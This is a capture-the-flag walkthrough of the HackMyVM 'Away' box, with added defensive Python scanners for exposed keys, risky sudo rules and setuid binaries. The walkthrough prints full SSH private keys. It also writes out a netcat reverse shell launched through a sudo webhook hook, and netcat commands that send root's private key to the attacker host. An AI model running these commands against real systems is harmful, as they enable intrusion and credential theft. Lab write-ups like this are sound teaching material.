NOTES ABOUT Away
[ 2022-10-08 ] [ HackMyVM / Away ] Status: Rooted
Skills: Port Scanning, OpenSSH, Sudo, webhook
Tools: nmap, nc, ssh
PORT SCANNING
$ nmap -T4 -sCSV -p- 10.0.2.20
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 f1:87:03:41:21:12:ef:80:3c:8f:07:2f:8b:3c:6e:2a (RSA)
| 256 5f:f9:ca:19:0d:74:65:2c:97:4a:36:a4:04:7c:9b:bd (ECDSA)
|_ 256 39:a4:b3:38:94:c5:d2:77:07:a1:dd:b4:2f:0a:5a:44 (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.18.0
GETTING IN
http://10.0.2.20/
Login: tula
+--[ED25519 256]--+
| . . =+. .o.. |
| + +.+ . .o |
| = + + + o |
| + B + o o |
| = S o . |
| = + o . |
| + X o . |
| O O. . . . |
| . E+.. . . |
+----[SHA256]-----+
$ wget http://10.0.2.20/id_ed25519 -O id_ed25519.key
http://10.0.2.20/id_ed25519
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABA+GY+qad
MDkU/yMHam3bmdAAAAEAAAAAEAAAAzAAAAC3NzaC1lZDI1NTE5AAAAIIpBfnwSG2XZXFTs
YR6Gg1apA+kuSgdtTkrrhhgskSJfAAAAsAEbt6fRUQfkYGDCdAa/zOBpiUuAV1kGiDs3F1
gD8y+UxeRdz6gQxbHAY53rE25YN+t1bml5GuNMx99CLApAQCMgeePifFV+t2gRnaMEGRnf
4u1RfM20X6rRYdKeQKHwrE5b/m4xgKC5FvKfiGESqirQ2XPWZnOfbcNc+czsut8t8v+zfl
kYo1mO1M4Va9i+OipgnoOJkdNB+mdx2f7YE0lWoHdt/7KVG5eDB90WrJZF
-----END OPENSSH PRIVATE KEY-----
$ wget http://10.0.2.20/id_ed25519
http://10.0.2.20/id_ed25519.pub
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIpBfnwSG2XZXFTsYR6Gg1apA+kuSgdtTkrrhhgskSJf My passphrase is: Theclockisticking
$ wget http://10.0.2.20/id_ed25519.pub
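The root cause of the foothold is a private key, its public half and a passphrase hint sitting in the nginx document root. The scanner below is an added example written for these notes (not part of the original write-up and not a tool used on the box): it walks a directory tree, reports files that carry private-key headers or public-key lines, and separately flags public keys whose comment field looks like a credential hint, exactly the pattern on this box. The demo builds a constructed web root with placeholder key files, so no real key material is involved.

```python
#!/usr/bin/env python3
"""Scan a directory tree (for example a web root) for exposed SSH key material.

Added example for this write-up. Assumptions: the key-header strings and the
hint words below are the example's own choice; the demo web root is constructed.
"""
import os
import re
import tempfile

PRIVATE_KEY_MARKERS = (
    b"-----BEGIN OPENSSH PRIVATE KEY-----",
    b"-----BEGIN RSA PRIVATE KEY-----",
    b"-----BEGIN EC PRIVATE KEY-----",
    b"-----BEGIN PRIVATE KEY-----",
)
# "<type> <base64 blob> [comment]" as written by ssh-keygen.
PUBLIC_KEY_RE = re.compile(
    rb"^(ssh-(?:rsa|ed25519|dss)|ecdsa-sha2-\S+)\s+\S+(?:\s+(.*))?$"
)
# Words in a public-key comment that suggest a credential was written down.
HINT_RE = re.compile(rb"pass(?:word|phrase)|secret", re.IGNORECASE)


def classify_file(path):
    """Return a finding string for `path`, or None if it holds no key material.

    Only the first 4 KiB is read: enough for the header line of a private key
    and for the single line of a public key, comment included.
    """
    try:
        with open(path, "rb") as fh:
            head = fh.read(4096)
    except OSError:
        return None
    if any(marker in head for marker in PRIVATE_KEY_MARKERS):
        return "private key"
    first_line = head.splitlines()[0] if head else b""
    m = PUBLIC_KEY_RE.match(first_line)
    if m:
        comment = m.group(2) or b""
        if HINT_RE.search(comment):
            return "public key with credential hint in comment"
        return "public key"
    return None


def scan_tree(root):
    """Walk `root` and return [(relative_path, finding), ...] sorted by path."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            finding = classify_file(full)
            if finding:
                findings.append((os.path.relpath(full, root), finding))
    return sorted(findings)


def demo():
    """Build a constructed web root with placeholder key files and scan it."""
    root = tempfile.mkdtemp(prefix="webroot-")
    with open(os.path.join(root, "index.html"), "w") as fh:
        fh.write("<html>Login: tula</html>\n")
    # Constructed placeholder: header only, no real key bytes.
    with open(os.path.join(root, "id_ed25519"), "wb") as fh:
        fh.write(b"-----BEGIN OPENSSH PRIVATE KEY-----\nPLACEHOLDER\n"
                 b"-----END OPENSSH PRIVATE KEY-----\n")
    # Constructed placeholder public key with a hint in the comment field.
    with open(os.path.join(root, "id_ed25519.pub"), "wb") as fh:
        fh.write(b"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPLACEHOLDER "
                 b"My passphrase is: example\n")
    return scan_tree(root)


if __name__ == "__main__":
    for rel, what in demo():
        print(f"{what}: {rel}")
```

Run it against the document root of any web server you operate (`scan_tree("/var/www/html")`); a hit for "private key" in a served directory is a finding regardless of whether the key is passphrase-protected, since the passphrase can be attacked offline once the file is public.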
SSH CONNECT
$ ssh tula@10.0.2.20 -i ./id_ed25519
[...]
Permissions 0644 for './id_ed25519' are too open.
[...]
tula@10.0.2.20: Permission denied (publickey).
$ chmod 0400 ./id_ed25519
$ ssh tula@10.0.2.20 -i ./id_ed25519
Enter passphrase for key './id_ed25519': Theclockisticking
tula@away:~$ cat user.txt
ELEVATING PRIVILEGES
tula@away:~$ sudo -l
Matching Defaults entries for tula on away:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User tula may run the following commands on away:
(lula) NOPASSWD: /usr/bin/webhook
tula@away:~$ sudo -u lula /usr/bin/webhook
[webhook] 2022/10/08 19:28:40 "couldn't load any hooks from file"!
aborting webhook execution since the -verbose flag is set to false.
If, for some reason, you want webhook to start without the hooks, either use -verbose flag, or -nopanic
tula@away:~$
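The sudo rule is the real weakness: webhook reads its hook definitions from whatever file the `-hooks` flag names, so letting tula run it as lula without a password is the same as letting tula run any command as lula. The parser below is an added example for these notes (not a tool from the write-up): it reads the text that `sudo -l` prints, extracts each rule, and flags rules that need no password or name a program that executes commands taken from a caller-controlled file. The set of such programs is an assumption of the example, seeded only with webhook because that is what this box shows.

```python
#!/usr/bin/env python3
"""Parse `sudo -l` output and flag rules worth reviewing.

Added example for this write-up. Assumptions: CONFIG_DRIVEN_EXECUTORS is a
list maintained for the example, not an authoritative one; SAMPLE is the
`sudo -l` output shown in the notes, reproduced as constructed test input.
"""
import re

# One rule line inside the "User X may run the following commands" block:
#   (lula) NOPASSWD: /usr/bin/webhook
#   (root) SETENV: NOPASSWD: /usr/bin/apt-get
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$"
)

# Programs that run commands read from a file or argument the invoking user
# controls. webhook does this via -hooks. Extend from your own review.
CONFIG_DRIVEN_EXECUTORS = {"webhook"}

# Constructed sample: the `sudo -l` output from the notes above.
SAMPLE = r"""Matching Defaults entries for tula on away:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User tula may run the following commands on away:
    (lula) NOPASSWD: /usr/bin/webhook
"""


def parse_sudo_l(text):
    """Return a list of {"runas", "nopasswd", "command"} dicts."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        if re.match(r"^User \S+ may run the following commands", line):
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.strip(":") for t in m.group("tags").split()}
        # "(user : group)" -> keep the user part only.
        runas = [u.strip() for u in m.group("runas").split(":")[0].split(",")]
        rules.append({
            "runas": runas,
            "nopasswd": "NOPASSWD" in tags,
            "command": m.group("cmd"),
        })
    return rules


def review(rules):
    """Attach a `findings` list to each rule; an empty list means nothing flagged."""
    for rule in rules:
        findings = []
        if rule["nopasswd"]:
            findings.append("NOPASSWD: no authentication before the identity switch")
        if rule["command"] == "ALL":
            findings.append("ALL: unrestricted command set")
        else:
            prog = rule["command"].split()[0].rsplit("/", 1)[-1]
            if prog in CONFIG_DRIVEN_EXECUTORS:
                findings.append(
                    f"{prog} executes commands from a caller-controlled file; "
                    "effectively any command as " + ",".join(rule["runas"])
                )
        rule["findings"] = findings
    return rules


if __name__ == "__main__":
    for rule in review(parse_sudo_l(SAMPLE)):
        print(rule["runas"], rule["command"], rule["findings"])
```

In a fleet audit, feed it the output of `sudo -l -U <user>` per account rather than the interactive `sudo -l`, and treat any rule with a non-empty findings list as needing a justification or a tighter command specification.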
PAYLOAD: [ automated-actions-webhooks-example-shell-script ]
$ cd /tmp
$ echo '#!/bin/bash' > rs.sh
$ echo '/usr/bin/nc -e /bin/bash 10.0.2.15 80' >> ./rs.sh
$ chmod +x ./rs.sh
$ echo '[{"id": "shell","execute-command": "/tmp/rs.sh"}]' > hook
$ sudo -u lula webhook -verbose -hooks ./hook
[...]
[webhook] 2022/10/08 19:40:01 attempting to load hooks from ./hook
[webhook] 2022/10/08 19:40:01 found 1 hook(s) in file
[webhook] 2022/10/08 19:40:01 loaded: shell
[webhook] 2022/10/08 19:40:01 serving hooks on http://0.0.0.0:9000/hooks/{id}
[...]
NOW AS LULA FROM THE REVERSE SHELL
$ find / -xdev -group lula 2>/dev/null
/home/lula
/home/lula/.bash_history
/home/lula/.bashrc
/home/lula/.bash_logout
/home/lula/.profile
/usr/bin/more
$ more /root/ro0t.txt
$ more /root/.ssh/id_ed25519
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACCZsnRA543yhxJSmFw8Nc2vT6umh4rqVRA5RwgKbTm/SAAAAJB3Fxg4dxcY
OAAAAAtzc2gtZWQyNTUxOQAAACCZsnRA543yhxJSmFw8Nc2vT6umh4rqVRA5RwgKbTm/SA
AAAECDZ5NtdbnBm8jUAAdwpKe3m6amsmnVy+AS2qRite6MpZmydEDnjfKHElKYXDw1za9P
q6aHiupVEDlHCAptOb9IAAAACXJvb3RAYXdheQECAwQ=
-----END OPENSSH PRIVATE KEY-----
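What makes `more` read /root as lula is a privileged binary whose group ownership restricts it to a single group, which `find -group lula` surfaces but does not explain. The audit below is an added example written for these notes (not the command from the write-up): it classifies a file from its lstat fields and flags set-uid root executables outside a baseline, plus any set-uid/set-gid executable that is group-executable but not world-executable and owned by a non-root group. The notes do not show the mode of the box's /usr/bin/more, so the sample records and their modes are constructed assumptions; gid 1001 stands in for lula.

```python
#!/usr/bin/env python3
"""Flag set-uid/set-gid executables restricted to a single group.

Added example for this write-up. Assumptions: SAMPLE records and modes are
constructed; BASELINE is a stand-in for the set-uid list of a stock install.
"""
import os
import stat


def classify(path, mode, uid, gid, baseline=frozenset()):
    """Return a list of findings for one regular file from its lstat fields."""
    findings = []
    if not stat.S_ISREG(mode):
        return findings
    suid = bool(mode & stat.S_ISUID)
    sgid = bool(mode & stat.S_ISGID)
    if not (suid or sgid):
        return findings
    if suid and uid == 0 and path not in baseline:
        findings.append("set-uid root outside baseline")
    # Group may execute, world may not: a privileged tool handed to one group.
    group_only = bool(mode & stat.S_IXGRP) and not (mode & stat.S_IXOTH)
    if gid != 0 and group_only:
        findings.append(f"privileged binary restricted to gid {gid}")
    return findings


def audit_tree(root, baseline=frozenset()):
    """Walk `root` without crossing filesystems (like find -xdev); return {path: findings}."""
    results = {}
    root_dev = os.lstat(root).st_dev

    def same_fs(p):
        try:
            return os.lstat(p).st_dev == root_dev
        except OSError:
            return False

    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if same_fs(os.path.join(dirpath, d))]
        for name in filenames:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)
            except OSError:
                continue
            found = classify(full, st.st_mode, st.st_uid, st.st_gid, baseline)
            if found:
                results[full] = found
    return results


# Constructed records (path, mode, uid, gid); the modes are assumptions.
SAMPLE = [
    ("/usr/bin/passwd", stat.S_IFREG | 0o4755, 0, 0),
    ("/usr/bin/more",   stat.S_IFREG | 0o4750, 0, 1001),  # gid 1001 stands in for lula
    ("/usr/bin/nc",     stat.S_IFREG | 0o755,  0, 0),
]
BASELINE = frozenset({"/usr/bin/passwd"})


def demo():
    """Classify the constructed records; only flagged paths are returned."""
    out = {}
    for path, mode, uid, gid in SAMPLE:
        found = classify(path, mode, uid, gid, BASELINE)
        if found:
            out[path] = found
    return out


if __name__ == "__main__":
    for path, found in demo().items():
        print(path, found)
```

On a live host call `audit_tree("/", baseline)` with a baseline captured from a clean image of the same distribution; the two findings together (set-uid root, usable by one group only) describe the `more` binary on this box and would be the first thing to investigate.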
SEND PRIVATE ROOT KEY VIA REVERSE SHELL.
more /root/.ssh/id_ed25519 > private_root
cat private_root | nc 10.0.2.15 443
$ nc -lvnp 443 > root_private
listening on [any] 443 ...
connect to [10.0.2.15] from (UNKNOWN) [10.0.2.20] 36284
^C
$ chmod 0400 root_private
$ ssh root@10.0.2.20 -i root_private
root@away:~# init 0